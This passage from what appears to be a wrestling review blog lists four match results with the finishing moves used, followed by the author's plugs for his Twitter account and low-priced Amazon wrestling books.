Sasha Banks b. Bayley – Crossface
Adam Rose b. Danny Burch – Party Stopper
Mojo Rawley b. Oliver Grey – Hyperdrive
Adrian Neville b. Brodus Clay – Red Arrow

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Clash of the Champions at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at: